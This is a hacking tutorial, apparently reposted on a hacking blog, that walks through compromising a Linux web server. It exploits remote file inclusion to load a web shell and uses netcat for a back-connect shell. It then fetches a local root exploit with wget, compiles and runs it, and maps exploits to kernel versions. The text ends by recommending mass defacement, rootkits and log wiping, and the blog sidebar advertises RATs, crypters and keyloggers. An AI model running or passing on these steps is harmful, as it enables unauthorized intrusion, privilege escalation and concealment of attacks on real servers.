======================================================================= R.F.I. Rooting Tutorial (Linux Server and Safe Mod: OFF) Author: An@sA_StAxtH Mail/MSN: admin@cyberanarchy.org/anasa_staxth@hotmail.com For Cyber Anarchy (Nov. 2007) ======================================================================= You will need: - Vulnerable Site in R.F.I. - Shell for R.F.I. (e.g. c99, r57 or other) - NetCat - Local Root Exploit (depending on the kernel and the version) This aim tutorial is to give a very general picture in process of Rooting in Linux Server with Safe Mod: OFF. - Suppose that we have found a site with R.F.I. vulnerability: http://www.hackedsite.com/folder/index.html?page= e can run shell exploiting Remote File Inclusion, as follows: http://www.hackedsite.com/folder/index.html?page=http://www.mysite.com/shells/evilscript.txt? where evilscript.txt is our web shell that we have already uploaded to our site. (www.mysite.com in the folder: shells) After we enter in shell, first of all we will see the version of the kernel at the top of the page or by typing: uname - a in Command line. To continue we must connect with backconnection to the box. This can done with two ways if we have the suitable shell. We can use the Back-Connect module of r57/c99 shell or to upload a backconnector in a writable folder In most of the shells there is a backconnection feature without to upload the Connect Back Shell (or another one shell in perl/c). We will analyze the first way which is inside the shell (in our example the shell is r57). Initially we open NetCat and give to listen in a specific port (this port must be correctly opened/forwarded in NAT/Firewall if we have a router) with the following way: We will type: 11457 in the port input (This is the default port for the last versions of r57 shell). We can use and other port. We press in Windows Start -> Run -> and we type: cmd After we will go to the NetCat directory: e.g. cd C:\Program Files\Netcat And we type the following command: nc -n -l -v -p 11457 NetCat respond: listening on [any] 11457 ... In the central page of r57 shell we find under the following menu::: Net:: and back-connect. In the IP Form we will type our IP (www.cmyip.com to see our ip if we have dynamic) In the Port form we will put the port that we opened and NetCat listens. If we press connect the shell will respond: Now script try connect to port 11457 ... If our settings are correct NetCat will give us a shell to the server Now we wil continue to the Rooting proccess. We must find a writable folder in order to download and compile the Local Root Exploit that will give us root priviledges in the box. Depending on the version of the Linux kernel there are different exploits. Some times the exploits fail to run because some boxes are patched or we don't have the correct permissions. List of the exploits/kernel: 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit 2.6.5 -> krad, krad2, h00lyshit 2.6.6 -> krad, krad2, h00lyshit 2.6.7 -> krad, krad2, h00lyshit 2.6.8 -> krad, krad2, h00lyshit 2.6.8-5 -> krad2, h00lyshit 2.6.9 -> krad, krad2, h00lyshit 2.6.9-34 -> r00t, h00lyshit 2.6.10 -> krad, krad2, h00lyshit 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit. Some sites that we can find Local Root Exploits: www.milw0rm (Try Search: "linux kernel") Other sites: www.packetstormsecurity.org | www.arblan.com or try Googlin' you can find 'em all ;-) We can find writable folders/files by typing: find / -perm -2 -ls We can use the /tmp folder which is a standard writable folder We type: cd /tmp To download the local root exploit we can use a download command for linux like wget. For example: wget http://www.arblan.com/localroot/h00lyshit.c where http://www.arblan.com/localroot/h00lyshit.c is the url of h00lyshit. After the download we must compile the exploit (Read the instruction of the exploit before the compile) For the h00lyshit we must type: gcc h00lyshit.c -o h00lyshit Now we have created the executable file: h00lyshit. The command to run this exploit is: ./h00lyshit We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or into another writable folder. The command is: dd if=/dev/urandom of=largefile count=2M where largefile is the filename. We must wait 2-3 minutes for the file creation If this command fails we can try: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Now we can procced to the last step. We can run the exploit by typing: ./h00lyshit largefile or ./h00lyshit /tmp/largefile (If we are in a different writable folder and the largefile is created in /tmp) If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root To check if we got root: id or whoami If it says root we got root! Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server. We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner. -
- Anonymous Mass Mailers (1)
- bots (1)
- browser (1)
- cool links (1)
- cracking tools (3)
- dos commands (3)
- ebooks (104)
- Exploits (14)
- file upload (3)
- firefox (1)
- flash games (2)
- free space (2)
- gmail (1)
- google (7)
- google chrome Vulnerability (7)
- graphics (5)
- greasemonkey scripts (8)
- gtalk (4)
- hacking (12)
- hacking ebooks (45)
- hacking tools (42)
- hacking tutorials (22)
- haking tutorials (37)
- hosting (1)
- image hosting (1)
- information (11)
- invisible (2)
- IP Scanner (14)
- java (2)
- javascript (4)
- keygen (1)
- Keyloggers (3)
- magazine (1)
- Mail Bombers (1)
- mcse (1)
- muliti login (1)
- networking (2)
- news (9)
- orkut (15)
- Port Scanner (14)
- proxy (2)
- RapidShare Libraries (1)
- regedit (1)
- Sniffers (1)
- sniffing (1)
- sql injection (5)
- tips n trics (41)
- upload sites (3)
- virus (9)
- virus removal (6)
- visual c++ (2)
- Vulnerability Scanner (1)
- wallpapers (5)
- web based hackiing (1)
- web design (1)
- web templates (1)
- Wireless Hacking (5)
-
►
2009
(127)
- ► August 2009 (33)
- ► March 2009 (40)
- ► February 2009 (17)
-
▼
2008
(211)
- ► November 2008 (13)
-
▼
September 2008
(198)
- Ultimate Hacking Experience 2008 Including Tutorial
- Keygen Pack 2008
- 156 clickable run commands
- Proxy tools 16 in 1 - AIO
- Best C++ Learning Ebooks AiO
- Mozilla FireFox -35in1
- Hacking E-Books AIO
- Photoshop Tutorials Books
- Google Chrome Carpet Bombing Vulnerability
- Google Chrome Remote DoS Vulnerability
- Google Chrome Silent Crash Exploit
- Google Chrome Inspect Element DoS Exploit
- Google Chrome Buffer Overflow
- Google Chrome Invalid URL Crash
- Google Chrome Omnibox Keylogger
- Find invisible persons in GTalk
- Web hacking video and countermeasure
- Certified Ethical hacking Student Guide
- Certified Ethical Hacker Series
- Ethical hacking resources
- GOOGLE - hackers best friend
- Ethical hacking/CEH 312-50
- Local File Inclusion Tutorial
- R.F.I. Rooting Tutorial
- Cool site for freewares
- Removing restrictions from pdf file
- Hidden Program In Microsoft windows
- 221 shortcut keys of windows xp
- Portable Windows XP Hidden App Launcher (AIO 23 in 1)
- RapidShare Libraries
- Security Whitepapers - hacking tutorials
- Windows Registry Editor: REGEDIT
- Reset an XP Password in various ways
- Dos commands [with detail]
- Angry IP Scanner
- Nmap Network Mapping Utility
- Foundstone Vision
- Foundstone FPort
- LanSpy - network security & port scanner
- Blue's Port Scanner
- Netcat : The Swiss Army knife of the administrator...
- Advanced IP Scanner 1.5 (FREE)
- NetworkActiv Port Scanner 4.0
- FreePortScanner 2.7
- Free IP Scanner 1.2
- Axence NetTools 3.0
- Advanced LAN Scanner 1.0
- JFirewallTest
- {List} Bots and Botnets
- {Lists} Mail Bombers and Anonymous mass mailers
- Acunetix Vulnerability Scanner 5.1
- Hacking Tools and Exploits
- Metasploit Framework v3.1 Released for DownloadMet...
- Youtube Hack for better picture quality
- vulnerability Internet Explorer 7
- IEEE 802 Wireless Systems
- LAN Wiring
- IT Essentials PC Hardware and Software Labs and St...
- Security Audit
- Misc
- HoneyPots
- Trojans
- Tracing Tools
- Password Cracking
- Sniffers
- DOS Attacks
- Proxy Servers
- Information Gathering tools
- xss
- The Virus Maker
- removing virus manually
- driveguard.exe virus
- amvo.exe virus removal
- Drive not opening on double click?? autorun.inf virus
- Autorun Virus Remover 2.3 (Portable) - Pendrive vi...
- Drivemonitor.exe flashguard.exe driveguard.exe
- How To Bypass Bios Password
- Best SQL injection Tools
- Usb Hack (new) !
- Ddos Tool
- Pro Rat V2.0 (RAT)
- Nuclear RAT 2.1.0
- Theef v2.10
- Unlimited Password Stealer 0.4
- 1337 exe crypter
- Zelda Crypt
- Kiams Crypter
- Password Cracking Tools
- Wardriving / WEP Cracking Tools
- Networking Hacking Tools
- Keyloggers
- DOS flooding Tools
- Miscellaneous Hacking Tools
- Google Chrome Easter Egg Revealed
- Browse with out BROWSER
- Link Checker For Firefox, rapidshare.com, megauplo...
- Ultimate Hacking Security Pack
- !! 300 Web Templates !!
- !! Create Heart with your name !!
- Hex Editors
Blog Archive
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment